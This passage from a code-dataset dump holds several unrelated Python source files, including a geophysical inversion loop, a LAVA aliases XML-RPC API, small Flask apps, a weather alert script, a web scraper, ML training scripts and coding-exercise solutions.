1\r\n ls_num = ls_num + 1\r\n\r\n if (Ck_propose < Cost[-1] or ls_num == 6):\r\n newData = newData_propose\r\n newData_log = np.log10(newData)\r\n v = v1_propose\r\n Ck = Ck_propose\r\n rho_recon_pred = rho_recon_pred_propose\r\n rho_recon_pred_1D = np.reshape(rho_recon_pred_propose, -1)\r\n break\r\n\r\n #########################################3\r\n print('Iter # {}, C = {}'.format(jj + 1, Ck))\r\n Cost.append(Ck)\r\n print('Relative data misfit = ')\r\n print(Cost)\r\n\r\n fig = plt.figure()\r\n ax1 = fig.add_subplot(1, 1, 1)\r\n plt.pcolor(xss1, zss1, np.reshape(newData[0:int(len(newData) / 2)], (freqNumberMT, 16), order='c'),\r\n cmap=plt.get_cmap('jet'))\r\n cbar = plt.colorbar()\r\n plt.clim(np.min(obRhoAmpliAct), np.max(obRhoAmpliAct))\r\n plt.tight_layout()\r\n plt.savefig('./inversion_results/' + UID +'/data_ite_{}.png'.format(jj+1))\r\n plt.close()\r\n\r\n # v_recons_array = K.eval(v1)\r\n plt.ion()\r\n fig = plt.figure(figsize=(5,5))\r\n ax1 = fig.add_subplot(1,1,1)\r\n plt.pcolor(xss, zss, np.reshape(np.array(v_array), (latent_dim, XNumberMT1), order='f'), cmap=plt.get_cmap('jet'))\r\n # plt.xlim(-1, plot_x-1)\r\n # plt.ylim(-1, plot_y-1)\r\n cbar = plt.colorbar()\r\n plt.clim(np.min(v_true_array), np.max(v_true_array))\r\n plt.tight_layout()\r\n plt.savefig('./inversion_results/'+UID+'/code_ite_{}.png'.format(jj+1))\r\n plt.ioff()\r\n plt.close()\r\n\r\n h_je.Plot2DImage(fieldXEnd-fieldXStart, domainDepth, interpXLocations, interpDepths, rho_recon_pred, 'mt', [bar_1, bar_2], 0,\r\n 1, './inversion_results/'+UID+'/', 'model_ite_{}.png'.format(jj+1), rangex=[0, 10],\r\n rangez=[-1, 0])\r\n savemat('./inversion_results/' + UID + '/No.' + str(jj+1) + ' Resistivity Model.mat', {'model': rho_recon_pred})\r\n if Cost[-1] < Cost_threshold and Cost[-2]-Cost[-1] 1:\n return (False,0)\n else:\n return (True, max(lefthigh,righthigh)+1 )\n\n else:\n return (True,0)\n\n\n\n\n\n\n\n\n\n\ndef main():\n import binarytree\n from binarytree import BiTreeNode as Node\n\n root = Node(1)\n root.left = Node(2)\n root.right = Node(3)\n root.left.left = Node(4)\n root.left.right = Node(5)\n root.right.left = Node(6)\n root.right.right = Node(7)\n\n print(isbalance(root))\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"15814/algorithm","sub_path":"trees/balancetree.py","file_name":"balancetree.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73737160514","text":"import xmlrpc.client\nfrom django.db import IntegrityError\nfrom django.forms import ValidationError\n\nfrom linaro_django_xmlrpc.models import ExposedV2API\nfrom lava_scheduler_app.api import check_perm\nfrom lava_scheduler_app.models import Alias, DeviceType\n\n\nclass SchedulerAliasesAPI(ExposedV2API):\n @check_perm(\"lava_scheduler_app.add_alias\")\n def add(self, name, device_type_name):\n \"\"\"\n Name\n ----\n `scheduler.aliases.add` (`name`)\n\n Description\n -----------\n Create a device-type alias\n Permission: lava_scheduler_app.add_alias\n\n Arguments\n ---------\n `name`: string\n Name of the alias\n 'device_type_name': string\n Name of the device type to alias\n\n Return value\n ------------\n None\n \"\"\"\n try:\n dt = DeviceType.objects.get(name=device_type_name)\n if not self.user.has_perm(DeviceType.VIEW_PERMISSION, dt):\n raise xmlrpc.client.Fault(\n 404, \"Device-type '%s' was not found.\" % device_type_name\n )\n alias = Alias(name=name, device_type=dt)\n alias.full_clean()\n alias.save()\n except ValidationError as e:\n raise xmlrpc.client.Fault(404, \"\\n\".join(e.messages))\n except DeviceType.DoesNotExist as nf:\n raise xmlrpc.client.Fault(400, \"Bad request. DeviceType does not exist\")\n except IntegrityError:\n raise xmlrpc.client.Fault(\n 400, \"Bad request. Alias or DeviceType name already exists.\"\n )\n\n @check_perm(\"lava_scheduler_app.delete_alias\")\n def delete(self, name):\n \"\"\"\n Name\n ----\n `scheduler.aliases.delete` (`name`)\n\n Description\n -----------\n Remove a device-type alias\n Permission: lava_scheduler_app.delete_alias\n\n Arguments\n ---------\n `name`: string\n Name of the alias\n\n Return value\n ------------\n None\n \"\"\"\n try:\n Alias.objects.get(name=name).delete()\n except Alias.DoesNotExist:\n raise xmlrpc.client.Fault(404, \"Alias '%s' was not found.\" % name)\n\n def list(self):\n \"\"\"\n Name\n ----\n `scheduler.aliases.list` ()\n\n Description\n -----------\n List available device-type aliases\n\n Arguments\n ---------\n None\n\n Return value\n ------------\n This function returns an XML-RPC array of aliases\n \"\"\"\n ret = []\n for alias in Alias.objects.all().order_by(\"name\"):\n ret.append(alias.name)\n return ret\n\n def show(self, name):\n \"\"\"\n Name\n ----\n `scheduler.aliases.show` (`name`)\n\n Description\n -----------\n Show alias details.\n\n Arguments\n ---------\n `name`: string\n Alias name\n\n Return value\n ------------\n This function returns an XML-RPC dictionary with alias details.\n \"\"\"\n try:\n alias = Alias.objects.get(name=name)\n except Alias.DoesNotExist:\n raise xmlrpc.client.Fault(404, \"Alias '%s' was not found.\" % name)\n\n dt = alias.device_type\n if dt is None or not self.user.has_perm(DeviceType.VIEW_PERMISSION, dt):\n return {\"name\": alias.name, \"device_type\": \"\"}\n\n return {\"name\": alias.name, \"device_type\": alias.device_type.name}\n","repo_name":"Linaro/lite-lava","sub_path":"lava_scheduler_app/api/aliases.py","file_name":"aliases.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"1423468891","text":"from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\n##########################################\n\n@app.route('/', methods=['GET', 'POST'])\ndef fun_1():\n if request.method == 'POST':\n email = request.form['in_1']\n return \"Welcome {}\".format(email)\n \n return render_template(\"index.html\")\n\n@app.route('/search', methods=['GET'])\ndef search_function():\n query = request.args['q']\n return \"Search query entered = {}\".format(query)\n\n#######################\n###################\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"sauravpanchal/test","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"25508252143","text":"from dotenv import load_dotenv\nimport os\nimport requests\n\nload_dotenv()\n\napi_key = os.getenv(\"APIKEY\")\nENDPOINT = \"https://api.openweathermap.org/data/2.5/onecall\"\nLONG = \"-78.8664\"\nLAT = \"36.0335\"\nEXCLUDE=\"current,minutely,daily,alerts\"\n\nparameters = {\n \"lat\": LAT,\n \"lon\": LONG,\n \"exclude\": EXCLUDE,\n \"appid\": api_key,\n \"units\": \"imperial\"\n}\n\nresponse = requests.get(url=ENDPOINT, params=parameters)\n\nresponse.raise_for_status()\n\nbody = response.json()\n#print(body[\"hourly\"])\nhourly_slice = body['hourly'][:12]\n\nfor hour in hourly_slice:\n weather_id = hour['weather'][0]['id']\n if weather_id < 700:\n print(\"bring an umbrella\")\n break","repo_name":"sdearth/pythoncourse","sub_path":"rain_alert/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23433113511","text":"from bisect import *\r\ndef naomicheat(f=\"E:\\\\Users\\\\Neta\\\\Downloads\\\\D-large.in\"):\r\n file = open(f, 'r')\r\n iternumber=int(file.readline().replace(\"\\n\",\"\"))\r\n for k in range(iternumber):\r\n n=int(file.readline().replace(\"\\n\",\"\"))\r\n naomi=sorted(file.readline().replace(\"\\n\",\"\").split(\" \"))\r\n ken=sorted(file.readline().replace(\"\\n\",\"\").split(\" \"))\r\n naomi=[float(i) for i in naomi]\r\n ken=[float(i) for i in ken]\r\n i=0\r\n j=0\r\n cheat=0\r\n legal=0\r\n #Stable solution provided, it's 3 and a half at the morning and im still\r\n #at this thingy... too tired to solve the 3rd question\r\n #at this point, i didn't even consider if this solutin is better\r\n #than the previous one, but Baylife.\r\n while(inaomi[i]):\r\n i=find_lt(naomi[i:],ken[j])+i+1\r\n else:\r\n j=j+1\r\n i=i+1\r\n cheat=cheat+1\r\n i=n-1\r\n j=n-1\r\n while(i>=0):\r\n if(ken[j] 0\n\n # Assert that the state file was created\n state_file = Path(runner.state_manager.base_path).glob(\"*.json\")\n assert len(list(state_file)) == 1\n\n\ndef test_config_interpolation_values(runner: Runner):\n \"\"\"\n Make sure the tap and target names are correct.\n \"\"\"\n assert runner.interpolation_values[\"TAP_EXECUTABLE\"] == \"tap-mock-fixture\"\n assert runner.interpolation_values[\"TARGET_EXECUTABLE\"] == \"target-jsonl\"\n\n\ndef test_config_interpolation_target_values(tap: Tap):\n \"\"\"\n Make sure the config gets interpolated correctly on the singer side.\n \"\"\"\n target = Target(\n \"target-jsonl\",\n config={\n \"tap_name\": \"{TAP_NAME}\",\n },\n )\n\n runner = Runner(tap, target)\n\n assert runner.target.config[\"tap_name\"] == \"tap_mock_fixture\"\n","repo_name":"quantile-development/elx","sub_path":"tests/test_elx/test_runner.py","file_name":"test_runner.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"27692559045","text":"\n\nimport token_server\nimport token_server.getToken\nimport requests\n\nimport json\n\n\ntoken = token_server.getToken.get()\npostUrl = \"https://api.weixin.qq.com/cgi-bin/message/custom/send?access_token=\" + token\n\nmsg = {\n \"touser\":\"userid_TODO\",\n \"msgtype\":\"text\",\n \"text\":\n {\n \"content\":\"Hello World\"\n }\n}\n\n\nr = requests.post(postUrl, data=json.dumps(msg))\nprint(r.text)\n","repo_name":"extendswind/python_tool_code","sub_path":"wechat_offical_account/postMessage.py","file_name":"postMessage.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26719056047","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 10 08:23:33 2017\n\n@author: xjw1001001\n\"\"\"\n#only when PAML in desktop is available,the yeast version only\nfrom Bio import Seq, SeqIO, AlignIO\nfrom Bio.Phylo.PAML import codeml, baseml\nimport numpy as np\nparalog_list = [['YLR406C', 'YDL075W'],\n ['YER131W', 'YGL189C'],\n ['YML026C', 'YDR450W'],\n ['YNL301C', 'YOL120C'],\n ['YNL069C', 'YIL133C'],\n ['YMR143W', 'YDL083C'],\n ['YJL177W', 'YKL180W'],\n ['YBR191W', 'YPL079W'],\n ['YER074W', 'YIL069C'],\n ['YDR418W', 'YEL054C'],\n ['YBL087C', 'YER117W'],\n ['YLR333C', 'YGR027C'],\n ['YMR142C', 'YDL082W'],\n ['YER102W', 'YBL072C'],\n ]\n\nfor pair in paralog_list:\n primalline=[]\n fastaline=[]\n with open('/Users/xjw1001001/Desktop/PAML/output/' + '_'.join(pair) +'/out/construct.fasta','r') as f:\n for line in f.readlines():\n primalline.append(line)\n sline = '>' + line\n sline=sline.replace('node #14','Root'+pair[0])\n sline=sline.replace(' ','')\n sline=sline.replace('\\n','')\n sline=sline.replace('node#15','N0'+pair[0])\n for i in range(5):\n sline=sline.replace('node#' + str(15+1+i),'N'+str(1+i)+pair[1])\n sline=sline.replace('node#' + str(20+1+i),'N'+str(1+i)+pair[0])\n sline=sline.replace(pair[0],pair[0] + '\\n')\n sline=sline.replace(pair[1],pair[1] + '\\n')\n fastaline.append(sline) \n f1 = open('/Users/xjw1001001/Desktop/PAML/PAMLfasta/PAML_' + '_'.join(pair) +'.fasta','w+')\n for line in fastaline:\n f1.write(line)\n f1.write('\\n')\n f1.close()\n\n#ERa_ERb\npair = ['ERa','ERb']\nprimalline=[]\nfastaline=[]\nsubstitution_dict = {'node#39':'N14ERa','node#38':'N8ERa','node#37':'N7ERa','node#36':'N6ERa','node#41':'N9ERa','node#40':'N5ERa'\n ,'node#35':'N4ERa','node#44':'N13ERa','node#46':'N12ERa','node#47':'N11ERa','node#45':'N10ERa'\n ,'node#43':'N3ERa','node#42':'N2ERa','node#34':'N1ERa'\n ,'node#53':'N14ERb','node#52':'N8ERb','node#51':'N7ERb','node#50':'N6ERb','node#55':'N9ERb','node#54':'N5ERb'\n ,'node#49':'N4ERb','node#58':'N13ERb','node#60':'N12ERb','node#61':'N11ERb','node#59':'N10ERb'\n ,'node#57':'N3ERb','node#56':'N2ERb','node#48':'N1ERb'}\nwith open('/Users/xjw1001001/Desktop/PAML/output/' + '_'.join(pair) +'/out/construct.fasta','r') as f:\n for line in f.readlines():\n primalline.append(line)\n sline = '>' + line\n sline=sline.replace('node #32','Root'+pair[0])\n sline=sline.replace(' ','')\n sline=sline.replace('\\n','')\n sline=sline.replace('node#33','N0'+pair[0])\n for i in substitution_dict.keys():\n sline=sline.replace(i,substitution_dict[i])\n sline=sline.replace(pair[0],pair[0] + '\\n')\n sline=sline.replace(pair[1],pair[1] + '\\n')\n fastaline.append(sline) \nf1 = open('/Users/xjw1001001/Desktop/PAML/PAMLfasta/PAML_' + '_'.join(pair) +'.fasta','w+')\nfor line in fastaline:\n f1.write(line)\n f1.write('\\n')\nf1.close()\n\n#ARa_ERa\npair = ['ARa','ERa']\nprimalline=[]\nfastaline=[]\nsubstitution_dict = {'node#36':'N12ERa','node#35':'N11ERa','node#34':'N7ERa','node#33':'N6ERa','node#32':'N5ERa','node#37':'N8ERa'\n ,'node#31':'N4ERa','node#41':'N10ERa','node#40':'N9ERa','node#39':'N3ERa','node#38':'N2ERa'\n ,'node#30':'N1ERa'\n ,'node#48':'N12ARa','node#47':'N11ARa','node#46':'N7ARa','node#45':'N6ARa','node#44':'N5ARa','node#49':'N8ARa'\n ,'node#43':'N4ARa','node#53':'N10ARa','node#52':'N9ARa','node#51':'N3ARa','node#50':'N2ARa'\n ,'node#42':'N1ARa','node#29':'N0ERa','node#28':'RootERa'}\nwith open('/Users/xjw1001001/Desktop/PAML/output/' + '_'.join(pair) +'/out/construct.fasta','r') as f:\n for line in f.readlines():\n primalline.append(line)\n sline = '>' + line\n sline=sline.replace(' ','')\n sline=sline.replace('\\n','')\n for i in substitution_dict.keys():\n sline=sline.replace(i,substitution_dict[i])\n sline=sline.replace(pair[0],pair[0] + '\\n')\n sline=sline.replace(pair[1],pair[1] + '\\n')\n fastaline.append(sline) \nf1 = open('/Users/xjw1001001/Desktop/PAML/PAMLfasta/PAML_' + '_'.join(pair) +'.fasta','w+')\nfor line in fastaline:\n f1.write(line)\n f1.write('\\n')\nf1.close()\n\n#ARGRMRPR\npairlist = [['AR', 'MR'],\n ['AR', 'GR'],\n ['AR', 'PR'],\n ['MR', 'GR'],\n ['MR', 'PR'],\n ['PR', 'GR']]\nfor pair in pairlist:\n primalline=[]\n fastaline=[]\n substitution_dict = {'node#25':'N4'+pair[0],'node#31':'N9'+pair[0],'node#30':'N7'+pair[0]\n ,'node#32':'N8'+pair[0],'node#29':'N6'+pair[0],'node#28':'N5'+pair[0]\n ,'node#27':'N3'+pair[0],'node#26':'N2'+pair[0],'node#24':'N1'+pair[0]\n ,'node#34':'N4'+pair[1],'node#40':'N9'+pair[1],'node#39':'N7'+pair[1]\n ,'node#41':'N8'+pair[1],'node#38':'N6'+pair[1],'node#37':'N5'+pair[1]\n ,'node#36':'N3'+pair[1],'node#35':'N2'+pair[1],'node#33':'N1'+pair[1]\n ,'node#23':'N0'+pair[0],'node#22':'ROOT'+pair[0]\n }\n with open('/Users/xjw1001001/Desktop/PAML/output/' + '_'.join(pair) +'/out/construct.fasta','r') as f:\n for line in f.readlines():\n primalline.append(line)\n sline = '>' + line\n sline=sline.replace(' ','')\n sline=sline.replace('\\n','')\n for i in substitution_dict.keys():\n sline=sline.replace(i,substitution_dict[i])\n sline=sline.replace(pair[0],pair[0] + '\\n')\n sline=sline.replace(pair[1],pair[1] + '\\n')\n fastaline.append(sline) \n f1 = open('/Users/xjw1001001/Desktop/PAML/PAMLfasta/PAML_' + '_'.join(pair) +'.fasta','w+')\n for line in fastaline:\n f1.write(line)\n f1.write('\\n')\n f1.close()\n\nPAML_parameter_dict = {}\npath = '/Users/xjw1001001/Desktop/PAML/'\nparalog_list = [['YLR406C', 'YDL075W'],#pair#TODO: other data\n ['YER131W', 'YGL189C'], ['YML026C', 'YDR450W'], ['YNL301C', 'YOL120C'], ['YNL069C', 'YIL133C'],\n ['YMR143W', 'YDL083C'], ['YJL177W', 'YKL180W'], ['YBR191W', 'YPL079W'], ['YER074W', 'YIL069C'],\n ['YDR418W', 'YEL054C'], ['YBL087C', 'YER117W'], ['YLR333C', 'YGR027C'], ['YMR142C', 'YDL082W'],\n ['YER102W', 'YBL072C'], ['EDN', 'ECP'],['ERa', 'ERb'],['AR', 'MR'],['AR', 'GR'],['AR', 'PR'],\n ['MR', 'GR'],['MR', 'PR'],['PR', 'GR'] ] \nfor pair in paralog_list:#parameters: kappa(-5), omega(-1), tau,branches \n PAML_parameter_dict['_'.join(pair)] = {}\n codeml_result = codeml.read(path+'output/' + '_'.join(pair) + '/out/' + '_'.join(pair) + '_codeml')\n #baseml_result = baseml.read('/Users/xjw1001001/Documents/GitHub/IGCexpansion2/test/Ancestral_reconstruction/PAML/output/' + '_'.join(pair) + '/' + '_'.join(pair) + '_baseml')\n parameter_list = codeml_result['NSsites'][0]['parameters']['parameter list'].split(' ')\n PAML_parameter_dict['_'.join(pair)]['kappa'] = parameter_list[-5]\n PAML_parameter_dict['_'.join(pair)]['omega'] = parameter_list[-1]\n \n ","repo_name":"xjw1001001/IGCexpansion","sub_path":"test/Ancestral_reconstruction/PAML/parse reconstructed fasta.py","file_name":"parse reconstructed fasta.py","file_ext":"py","file_size_in_byte":7314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26662826915","text":"# this is a simple code to get google search numbers for a word.\n\n# import packages\n\nfrom pytrends.request import TrendReq\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\n\n# define a function for this simple task\n\ndef get_searches ( key_word, state, time_frame ):\n \n pytrends = TrendReq(hl = 'en-US', tz = 360)\n pytrends.build_payload([key_word], cat= 0, timeframe= '{}'.format(time_frame),\n gprop='', geo='US-{}'.format(state))\n df = pytrends.interest_over_time()\n print(df.head())\n\n sns.set()\n df['timestamp'] = pd.to_datetime(df.index)\n sns.lineplot(df['timestamp'], df[key_word])\n\n plt.title(\"Normalized search for {} in {}\".format(key_word, state))\n plt.xlabel(\"Date\")\n plt.ylabel(\"Number of search \")\n plt.show()\n\n\n# here you can put search word, State code and time frame\n# time frame should be in this format 'YYYY-MM-DD YYYY-MM-DD'\n\nget_searches('Corona', 'NY', '2020-03-01 2020-03-30') \n","repo_name":"munirdin87/projects","sub_path":"google_search.py","file_name":"google_search.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23432933281","text":"f = open('d.in')\nout = open('d.out', 'w+')\nt = int(f.readline())\ndef res(blocks, choice):\n if choice > blocks[len(blocks)-1]:\n return blocks[0]\n else:\n i = 0\n while blocks[i] < choice:\n i+=1\n return blocks[i]\nfor tc in range(t):\n f.readline()\n nao = sorted([float(a) for a in f.readline().split()])\n ken = sorted([float(a) for a in f.readline().split()])\n fnao = nao[:]\n fken = ken[:]\n fscore = 0\n score = 0\n while len(nao) > 0:\n fn = fnao.pop(len(fnao)-1)\n fk = fken.pop(fken.index(res(fken, fn)))\n if fn > fk:\n fscore += 1\n if min(nao) div.a-spacing-small > div.a-spacing-none > a\")\r\n for s in selects:\r\n get = s.get(\"href\")\r\n print(get)\r\n books_detail_URL.append(get)\r\n\r\n# We can use a with statement to ensure threads are cleaned up promptly\r\ndef main():\r\n with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:\r\n for data in executor.map(load_url, URLS):\r\n with open(\"Books_detail_URL.txt\", \"w\") as f:\r\n f.write(json.dumps(books_detail_URL))\r\n\r\nif __name__ == '__main__':\r\n t_s = time.time()\r\n main()\r\n t_e = time.time()\r\n print(t_e-t_s)","repo_name":"frankye1000/python--crawling","sub_path":"Crawling--Amazon/Amazon_thread_to_txt.py","file_name":"Amazon_thread_to_txt.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33900888051","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\nimport lightgbm as lgbm\nimport datetime\nimport warnings\nwarnings.filterwarnings('ignore')\nstart = datetime.datetime.now()\n\ntrain = pd.read_csv('train_processed1.csv')\n# test = pd.read_csv('test_processed1.csv')\ntrain['category_id_2'] = train['category_id_2'].astype(np.float32)\nX_train, X_test, Y_train, Y_test = train_test_split(train['ITEM_NAME'], train['category_id_2'], random_state = 0, test_size=0.2, shuffle=True)\n\ncount_vect = CountVectorizer()\nX_train_counts = count_vect.fit_transform(X_train)\ntfidf_transformer = TfidfTransformer()\nX_train_tfidf = tfidf_transformer.fit_transform(X_train_counts)\nX_test_counts = count_vect.transform(X_test)\n\nX_train_tfidf = X_train_tfidf.astype('float32')\nX_test_counts = X_test_counts.astype('float32')\nY_train = Y_train.astype('float32')\nY_test = Y_test.astype('float32')\n\nclf_gbm=lgbm.LGBMClassifier(boosting_type='gbdt', objective='multiclass', learning_rate=0.02, num_leaves=60, max_depth=4,\n n_estimators=2000, silent=True)\n\nclf_gbm.fit(X_train_tfidf, Y_train, eval_set=[(X_train_tfidf, Y_train), (X_test_counts, Y_test)], early_stopping_rounds=50, verbose=10) #x_train和y_train 是numpy或pandas数据类型即可\npre = clf_gbm.predict(X_test_counts)\n\n\nclf_gbm.booster_.save_model('lgb_model1.txt', num_iteration=clf_gbm.best_iteration_)\nprint(accuracy_score(Y_test, pre))\n# bst = lgbm.Booster(model_file='lgb_model.txt')\nend = datetime.datetime.now()\nprint(end-start)\n# train_X_1 = count_vect.transform(train['ITEM_NAME']).astype('float32')\n# train['label'] = clf_gbm.predict(train_X_1)\n# train.to_csv('train_lll.csv',index=False)","repo_name":"NJUPTGK/wenbenfenlei","sub_path":"lgb.py","file_name":"lgb.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"24344983033","text":"\"\"\"\nAuthor username(s): pylescj ; johnsoam\nDate: September 7, 2016\nAssignment/problem number: Homework Assignment 2/Problem 2\nAssignment/problem title: Time Conversion\n\"\"\"\nprint(\"Welcome to Time Converter.\")\noriginalTime=float(input(\"Please enter the time in milliseconds: \"))\nsecondsTens=int(originalTime//10000%6)\nsecondsOnes=int(originalTime%10000)/1000\nminutes=int((originalTime//60000))\nprint(\"Time: \"+str(minutes)+\":\"+str(secondsTens)+str(secondsOnes))\n","repo_name":"Redwoods87/CS167","sub_path":"time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5439802985","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport urllib2\n\n\ndef get_xml():\n \"\"\"\n Get xml file from a server and save it.\n \"\"\"\n url = 'http://sargo.bolt.stxnext.pl/users.xml'\n source = urllib2.urlopen(url)\n contents = source.read()\n\n with open('runtime/data/users.xml', 'w') as export:\n export.write(contents)\n\n\nget_xml()\n","repo_name":"d-wysocki/presence-analyzer-dwysocki","sub_path":"get_xml.py","file_name":"get_xml.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17184611980","text":"import MicrophoneStream as MS\nimport ex4_getText2VoiceStream as gt2v\nimport weather_inform\nimport traffic_inform\nimport news_inform\n\ndef action(text):\n keyword_1=\"교통\"\n keyword_2=\"날씨\"\n keyword_3=\"일정\"\n keyword_4=\"뉴스\"\n\n if (keyword_1 in text):\n print(\"교통정보 알려드림\")\n MS.play_file(\"./data/yes_sound.wav\")\n gt2v.getText2VoiceStream(traffic_inform.getBusInform(), \"./reply_sound.wav\")\n MS.play_file(\"./reply_sound.wav\")\n elif (keyword_2 in text):\n print(\"날씨 알려드림\")\n MS.play_file(\"./data/yes_sound.wav\")\n gt2v.getText2VoiceStream(weather_inform.getWeather(), \"./reply_sound.wav\")\n MS.play_file(\"./reply_sound.wav\")\n \n elif (keyword_3 in text):\n print(\"\")\n MS.play_file(\"./data/yes_sound.wav\") \n elif (keyword_4 in text):\n print(\"뉴스 정보 알려드림\")\n MS.play_file('./data/yes_sound.wav')\n news = news_inform.getNews()\n for i in range(5):\n gt2v.getText2VoiceStream(news[i], \"./reply_sound.wav\")\n MS.play_file(\"./reply_sound.wav\")\n else:\n MS.play_file(\"./data/reQuery_sound.wav\")\n","repo_name":"Gachon-P/AI","sub_path":"Briefe.py","file_name":"Briefe.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41213397506","text":"# Import the Gtts module for text \n# to speech conversion\n#pip install gTTS\nfrom gtts import gTTS \n \n# import Os module to start the audio file\nimport os \n \nmytext = 'Hello my name is manas kumar mahanandia'\n \n# Language we want to use \nlanguage = 'en-US'\n \n\nmyobj = gTTS(text=mytext, lang=language, slow=False) \n \n\nmyobj.save(\"output.mp3\") \n \n# Play the converted file \nos.system(\"start output.mp3\") ","repo_name":"Tapas15/Python-Projects","sub_path":"text2speech/text2speech0.py","file_name":"text2speech0.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26247751848","text":"import os.path as osp\nimport warnings\nwarnings.filterwarnings('ignore')\n\nfrom openstl.api import BaseExperiment\nfrom openstl.utils import (create_parser, default_parser, get_dist_info, load_config,\n setup_multi_processes, update_config)\n\ntry:\n import nni\n has_nni = True\nexcept ImportError: \n has_nni = False\n\n\nif __name__ == '__main__':\n args = create_parser().parse_args()\n config = args.__dict__\n\n if has_nni:\n tuner_params = nni.get_next_parameter()\n config.update(tuner_params)\n\n cfg_path = osp.join('./configs', args.dataname, f'{args.method}.py') \\\n if args.config_file is None else args.config_file\n if args.overwrite:\n config = update_config(config, load_config(cfg_path),\n exclude_keys=['method'])\n else:\n loaded_cfg = load_config(cfg_path)\n config = update_config(config, loaded_cfg,\n exclude_keys=['method', 'batch_size', 'val_batch_size',\n 'drop_path', 'warmup_epoch'])\n default_values = default_parser()\n for attribute in default_values.keys():\n if config[attribute] is None:\n config[attribute] = default_values[attribute]\n\n # set multi-process settings\n setup_multi_processes(config)\n\n print('>'*35 + ' training ' + '<'*35)\n exp = BaseExperiment(args)\n rank, _ = get_dist_info()\n exp.train()\n\n if rank == 0:\n print('>'*35 + ' testing ' + '<'*35)\n mse = exp.test()\n\n if rank == 0 and has_nni:\n nni.report_final_result(mse)\n","repo_name":"chengtan9907/OpenSTL","sub_path":"tools/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":403,"dataset":"github-code","pt":"61"} +{"seq_id":"34839170684","text":"from constants import LARGEST_EPOCH_TIME, SMALLEST_EPOCH_TIME\nfrom dao import (\n delete_from_collection,\n events_collection,\n get_all_data,\n get_item_by_id,\n line_items_collection,\n remove_event_from_line_item,\n upsert,\n upsert_with_id,\n)\nfrom flask import Blueprint, jsonify, request\nfrom flask_jwt_extended import jwt_required, get_current_user\nfrom helpers import html_date_to_posix\n\nevents_blueprint = Blueprint(\"events\", __name__)\n\n# TODO: Exceptions\n\n\n@events_blueprint.route(\"/api/events\", methods=[\"GET\"])\n@jwt_required()\ndef all_events():\n \"\"\"\n Get All Events\n Filters:\n - Start Time\n - End Time\n \"\"\"\n filters = {}\n print(f\"Current User: {get_current_user()['username']}\")\n start_time = float(request.args.get(\"start_time\", SMALLEST_EPOCH_TIME))\n end_time = float(request.args.get(\"end_time\", LARGEST_EPOCH_TIME))\n filters[\"date\"] = {\"$gte\": start_time, \"$lte\": end_time}\n events = get_all_data(events_collection, filters)\n events_total = sum(event[\"amount\"] for event in events)\n return jsonify({\"total\": events_total, \"data\": events})\n\n\n@events_blueprint.route(\"/api/events/\", methods=[\"GET\"])\n@jwt_required()\ndef get_event(event_id):\n \"\"\"\n Get An Event\n \"\"\"\n event = get_item_by_id(events_collection, event_id)\n return jsonify(event)\n\n\n@events_blueprint.route(\"/api/events\", methods=[\"POST\"])\n@jwt_required()\ndef post_event():\n \"\"\"\n Create An Event\n \"\"\"\n new_event = request.get_json()\n if len(new_event[\"line_items\"]) == 0:\n return jsonify(\"Failed to Create Event: No Line Items Submitted\")\n\n filters = {}\n filters[\"_id\"] = {\"$in\": new_event[\"line_items\"]}\n line_items = get_all_data(line_items_collection, filters)\n earliest_line_item = min(line_items, key=lambda line_item: line_item[\"date\"])\n\n new_event[\"id\"] = f\"event{earliest_line_item['id'][9:]}\"\n if new_event[\"date\"]:\n new_event[\"date\"] = html_date_to_posix(new_event[\"date\"])\n else:\n new_event[\"date\"] = earliest_line_item[\"date\"]\n\n if new_event[\"is_duplicate_transaction\"]:\n new_event[\"amount\"] = line_items[0][\"amount\"]\n else:\n new_event[\"amount\"] = sum(line_item[\"amount\"] for line_item in line_items)\n\n upsert_with_id(events_collection, 